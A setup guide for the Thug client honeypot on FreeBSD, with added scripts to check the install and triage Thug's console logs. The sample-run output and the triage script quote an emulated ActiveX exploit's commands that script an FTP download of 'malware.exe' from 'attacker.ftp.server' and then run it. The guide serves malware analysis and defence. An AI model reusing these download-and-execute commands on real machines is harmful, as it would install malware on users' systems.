Thug is a low-interaction client honeypot used for analyzing web-based, client-side attacks. As client-side attacks become more obfuscated and difficult to analyze, Thug can be used to emulate the behavior of a web browser (16 different User-Agents at time of writing) to detect malicious web pages while creating detailed logs and saving payloads.

While looking into Thug I found that there wasn't an existing guide for installing it on FreeBSD. The Thug build documentation is good, but I found it makes a number of assumptions on prerequisites already being installed. After some trial and error I've documented the entire process I used to get Thug running on a fresh FreeBSD 9.1 image.

The following guide was done on a minimal install of FreeBSD 9.1 (i386) with only the 'SSH Server' chosen during installation. Also, all commands are run as the 'root' user.

First we'll install any security updates for the OS and install the latest ports tree:

freebsd-update fetch install
portsnap fetch extract

The Portmaster utility will be used to build and install most of the required packages so we'll install that next:

cd /usr/ports/ports-mgmt/portmaster/ && make -DBATCH install clean

At the time of writing there was an issue with the distro sites for 'pkgconf' so manually download the port tarball:

cd /usr/ports/distfiles; fetch

I also don't want a full X11 installation, just the minimal dependencies, so I add a global 'make' option to /etc/make.conf:

echo "WITHOUT_X11=yes" >> /etc/make.conf

Now install the required tools, libraries and Python modules:

portmaster -dG --no-confirm \
devel/subversion        \
devel/git               \
devel/boost-libs        \
devel/boost-python-libs \
devel/autoconf          \
devel/libtool           \
devel/libexecinfo       \
devel/py-zope.interface \
www/py-beautifulsoup    \
www/py-cssutils         \
www/py-httplib2         \
devel/py-pefile         \
www/py-html5lib         \
textproc/py-chardet     \
devel/py-parsing        \
graphics/py-pydot

The remaining packages will be built manually so we'll create a directory to work from:

mkdir /usr/local/src; cd /usr/local/src

Grab the Thug source from GitHub:

git clone /opt/thug

Google V8

Pull the latest V8 code from Google Code and apply the required Thug patch:

svn checkout v8
patch -p0 < /opt/thug/patches/V8-patch1.diff
setenv V8_HOME /usr/local/src/v8

Pull revision 478 of PyV8 from Google Code, build and install:

svn checkout -r478 pyv8
cd pyv8
python setup.py build
python setup.py install

Libemu is for X86 emulation and shellcode detection:

cd /usr/local/src
git clone git://
cd libemu
autoreconf -v -i
./configure --prefix=/opt/libemu
make install

Now add the Libemu libraries to the shared library cache:

ldconfig -m /opt/libemu/lib

Pylibemu is a Python wrapper for the Libemu library:

cd /usr/local/src
git clone git://
cd pylibemu
python setup.py build
python setup.py install
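Before trying the samples it is worth confirming that every piece built above is actually visible to the Python interpreter Thug will run under. The following preflight script is an added example, not part of the original post or of the Thug project. It checks that the modules installed through portmaster plus PyV8 and pylibemu import cleanly, that V8_HOME is set to an existing directory (the post sets it with setenv), and that the Libemu library directory from the post (/opt/libemu/lib) exists. The import names in THUG_MODULES are my mapping from the port names and are an assumption; adjust them if your ports tree names a module differently.

```python
"""Preflight check for a Thug installation (added example, not code from
the original post or from Thug itself)."""
import importlib
import os

# Import names for the ports installed earlier plus the two modules built
# from source. The mapping from port name to import name is an assumption.
THUG_MODULES = [
    "zope.interface",   # devel/py-zope.interface
    "bs4",              # www/py-beautifulsoup
    "cssutils",         # www/py-cssutils
    "httplib2",         # www/py-httplib2
    "pefile",           # devel/py-pefile
    "html5lib",         # www/py-html5lib
    "chardet",          # textproc/py-chardet
    "pyparsing",        # devel/py-parsing
    "pydot",            # graphics/py-pydot
    "PyV8",             # built from the pyv8 checkout
    "pylibemu",         # built from the pylibemu checkout
]

LIBEMU_LIB = "/opt/libemu/lib"   # --prefix=/opt/libemu from the libemu build


def check_modules(names):
    """Return the subset of `names` that cannot be imported.

    A broken native build (for example PyV8 linked against the wrong V8)
    usually surfaces as an ImportError with an undefined-symbol message,
    so the exception text is kept for the report.
    """
    missing = []
    for name in names:
        try:
            importlib.import_module(name)
        except ImportError as exc:
            missing.append("%s (%s)" % (name, exc))
    return missing


def check_paths(env=None, libemu_lib=LIBEMU_LIB):
    """Return a list of problems with V8_HOME and the Libemu library dir.

    `env` defaults to the real process environment; it is a parameter so the
    logic can be exercised with a constructed mapping.
    """
    env = os.environ if env is None else env
    problems = []
    v8_home = env.get("V8_HOME")
    if not v8_home:
        problems.append("V8_HOME is not set (the post uses: setenv V8_HOME /usr/local/src/v8)")
    elif not os.path.isdir(v8_home):
        problems.append("V8_HOME=%s is not a directory" % v8_home)
    if not os.path.isdir(libemu_lib):
        problems.append("%s not found; build libemu and run: ldconfig -m %s"
                        % (libemu_lib, libemu_lib))
    return problems


def preflight(modules=THUG_MODULES, env=None, libemu_lib=LIBEMU_LIB):
    """Run both checks and return a report dict; report['ok'] is True when
    nothing is missing."""
    report = {
        "missing_modules": check_modules(modules),
        "path_problems": check_paths(env, libemu_lib),
    }
    report["ok"] = not report["missing_modules"] and not report["path_problems"]
    return report


if __name__ == "__main__":
    result = preflight()
    for item in result["missing_modules"]:
        print("missing module: %s" % item)
    for item in result["path_problems"]:
        print("path problem:   %s" % item)
    print("preflight %s" % ("OK" if result["ok"] else "FAILED"))
```

Run it with the same interpreter you used for the setup.py steps; a module that built fine but installed into a different site-packages directory shows up here as missing, which is the most common reason the Thug sample run fails after an otherwise clean build.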

You should now have a fully functional Thug installation! You can test it out with some of the samples that come with the Thug source:

python /opt/thug/src/ -l /opt/thug/samples/exploits/hpinfo1.html


[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">
[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo IDidntDoAnything>> c:\ftpd&echo password>> c:\ftpd&echo binary>> c:\ftpd&echo get malware.exe c:\malware.exe >> c:\ftpd&echo quit>> c:\ftpd
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo cd c:\>> c:\ftpd.bat&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\malware.exe >> c:\ftpd.bat
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd&del c:\malware.exe
[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846
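The console output above already contains the facts an analyst wants from a sample: which ActiveX control was instantiated, what commands the emulated control was asked to launch, which remote host those commands reach out to, and where Thug wrote the full analysis. The script below is an added example, not part of the original post or of Thug, that pulls those fields out of Thug's '[timestamp] message' console lines so a batch of samples can be summarised without reading each log by hand. The SAMPLE_LOG string is constructed from the post's own output, shortened to a few lines; the regular expressions target only the message formats visible in that output.

```python
"""Triage helper for Thug console output (added example, not code from the
original post or from Thug). Parses '[timestamp] message' lines and
collects ActiveX CLSIDs, LaunchApp commands, remote hosts named in an
FTP 'open' command, and the directory the analysis was saved to."""
import re

# Constructed sample in the format of the post's output (shortened).
SAMPLE_LOG = r"""[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">
[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo quit>> c:\ftpd
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd
[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846
"""

# One console line: "[<timestamp>] <message>"
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<msg>.*)$")
# "ActiveXObject: <CLSID>" as emitted when a control is instantiated
CLSID_RE = re.compile(r"ActiveXObject:\s*([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")
# "[<component>] LaunchApp called to run: <command>"
LAUNCH_RE = re.compile(r"\[(?P<component>[^\]]+)\]\s+LaunchApp called to run:\s*(?P<cmd>.*)$")
# "echo open <host>" inside a scripted ftp session written by the command
FTP_OPEN_RE = re.compile(r"\becho open (\S+)")
# "Saving log analysis at <path>"
SAVED_RE = re.compile(r"Saving log analysis at\s+(\S+)")


def parse_lines(text):
    """Return a list of (timestamp, message) tuples for well-formed lines;
    anything that does not carry the bracketed timestamp is ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m.group("ts"), m.group("msg")))
    return events


def triage(text):
    """Summarise one Thug console log into a dict of indicators."""
    summary = {
        "event_count": 0,
        "clsids": [],        # unique CLSIDs, in order of first appearance
        "launched": [],      # one entry per LaunchApp call
        "remote_hosts": [],  # unique hosts from 'echo open <host>'
        "log_dir": None,     # where Thug saved the full analysis
    }
    for ts, msg in parse_lines(text):
        summary["event_count"] += 1

        m = CLSID_RE.search(msg)
        if m:
            clsid = m.group(1).upper()
            if clsid not in summary["clsids"]:
                summary["clsids"].append(clsid)

        m = LAUNCH_RE.search(msg)
        if m:
            cmd = m.group("cmd").strip()
            summary["launched"].append(
                {"time": ts, "component": m.group("component"), "command": cmd})
            for host in FTP_OPEN_RE.findall(cmd):
                if host not in summary["remote_hosts"]:
                    summary["remote_hosts"].append(host)

        m = SAVED_RE.search(msg)
        if m:
            summary["log_dir"] = m.group(1)
    return summary


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("events:       %d" % result["event_count"])
    print("CLSIDs:       %s" % ", ".join(result["clsids"]))
    for entry in result["launched"]:
        print("launch [%s]: %s" % (entry["component"], entry["command"]))
    print("remote hosts: %s" % ", ".join(result["remote_hosts"]))
    print("saved to:     %s" % result["log_dir"])
```

In practice you would pipe the console output of each sample run into this (or point it at the saved log directory) and compare the CLSIDs and remote hosts across samples; the CLSID tells you which vulnerable control the page targets, and the host list is what you hand to whoever maintains the network blocklist.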

